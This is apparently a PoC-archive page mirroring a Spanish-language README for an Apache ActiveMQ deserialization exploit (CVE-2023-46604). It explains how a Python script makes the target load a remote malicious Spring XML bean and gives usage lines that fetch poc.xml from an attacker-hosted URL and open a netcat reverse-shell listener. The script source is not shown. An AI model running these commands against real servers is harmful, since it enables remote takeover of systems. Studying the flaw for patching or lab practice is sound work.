Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%

CVE-2023-46604 PoC — Apache ActiveMQ, Apache ActiveMQ Legacy OpenWire Module: Unbounded deserialization causes ActiveMQ to be vulnerable to a

Source
Associated Vulnerability
Title:Apache ActiveMQ, Apache ActiveMQ Legacy OpenWire Module: Unbounded deserialization causes ActiveMQ to be vulnerable to a remote code execution (RCE) attack (CVE-2023-46604)
Description:The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.
Description
El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) 
Readme
Resumen Técnico del Ataque: CVE-2023-46604

El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) para lograr la ejecución remota de código en el servidor objetivo.
Descripción del Proceso de Explotación

    Objetivo de la Vulnerabilidad:
        La vulnerabilidad reside en el protocolo OpenWire de Apache ActiveMQ.
        Permite la deserialización insegura de objetos, lo que puede ser aprovechado para ejecutar código arbitrario en el servidor.

    Requisitos Previos:
        Acceso de red al servidor ActiveMQ.
        Un archivo XML malicioso (poc.xml) disponible a través de una URL accesible por el servidor objetivo.

    Componentes del Ataque:
        Script Python: Automatiza el envío del payload malicioso al servidor ActiveMQ.
        Archivo XML (poc.xml): Contiene un bean de Spring que define la ejecución de un comando malicioso (por ejemplo, abrir una shell inversa).

Pasos del Ataque

    Preparación del Payload:
        El script construye un mensaje en hexadecimal que incluye:
            El nombre de la clase Java: org.springframework.context.support.ClassPathXmlApplicationContext.
            La URL del archivo XML malicioso.
        El payload se convierte en una secuencia de bytes que puede ser enviada a través del protocolo OpenWire.

    Envío del Payload:
        El script abre una conexión de socket TCP al servidor ActiveMQ en el puerto especificado (por defecto 61616).
        Envía el payload malicioso al servidor.

    Ejecución del Código Malicioso:
        El servidor ActiveMQ deserializa el objeto especificado en el payload.
        Debido a la deserialización insegura, se carga y ejecuta el bean de Spring definido en el archivo XML.
        Este bean ejecuta un comando malicioso (por ejemplo, una shell inversa) en el servidor.

        _________________________________________________________
ejemplo de ejecucion:
- ***python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml***

- **nc -lvnp 9001**



este script fue copiado y modificado en español:https://github.com/evkl1d/CVE-2023-46604.git
File Snapshot

[4.0K] /data/pocs/7c8ef2dd1a90dbc008903fa8242797dd64ddb609 ├── [1.8K] CVE-2023-46604.py ├── [ 665] poc.xml └── [2.1K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →